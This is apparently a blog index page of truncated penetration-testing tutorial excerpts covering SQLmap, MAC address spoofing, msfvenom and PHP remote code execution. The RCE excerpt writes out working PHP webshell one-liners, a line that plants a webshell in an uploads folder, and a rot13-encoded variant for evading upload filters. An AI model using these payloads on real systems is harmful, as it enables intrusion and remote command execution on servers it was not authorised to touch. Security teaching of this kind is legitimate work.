[ Pen Testing ] :: Step by Step: Database Enumeration

Hacking in the dark

Database Enumeration

Enumeration With SQLmap

SQLmap is noisy as hell. Here is the official options/examples page: https://github.com/sqlmapproject/sqlmap/wiki/Usage.

For example, save a captured header as an input file for SQLmap:

Load HTTP request from a file

Option: -r

One of the possibilities of sqlmap is loading of raw HTTP request from a textual file. That way …

[ Pen Testing ] :: Step by Step: Changing Your MAC Address

macchanger

Hide Your Ass, Change Your MAC

Manually

ifconfig wlan0 down
ifconfig wlan0 hw ether f1:a7:12:34:1b:c1
ifconfig wlan0 up

With macchanger

ifconfig wlan0 down
# print your MAC
macchanger -s wlan0
# set your MAC
macchanger -m 11:22:33:44:55:66 wlan0
# set to a random vendor, random ID
macchanger -A wlan0
# set to your physical vendor, …

[ Pen Testing ] :: Step by Step: msfvenom

Msfvenom creates shellcode from within Bash.

Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

“Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/

And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html

Open Bash and enter:

msfvenom

to get a syntax page.

View a list of payloads:

msfvenom -l payloads

Create the reverse …

[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)

Glenn Norman hacking

Remote Code Execution RCE

PHP RCE

Test a form for vulnerability to PHP RCE:

<?php phpinfo(); ?>

Get a remote PHP shell:

<?php system($_GET["c"]); ?>
<?php `$_GET["c"]`; ?>

Upload a file:

<?php file_put_contents('/var/www/html/uploads/test.php', '<?php system($_GET["c"]);?>'); ?>

Evade file-type upload filters using rot13 + urlencode:

<?php $payload="%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E"; file_put_contents('/var/www/html/uploads/testfile.php', str_rot13(urldecode($payload))); ?>

RCE via webshell

Pentest Monkey has …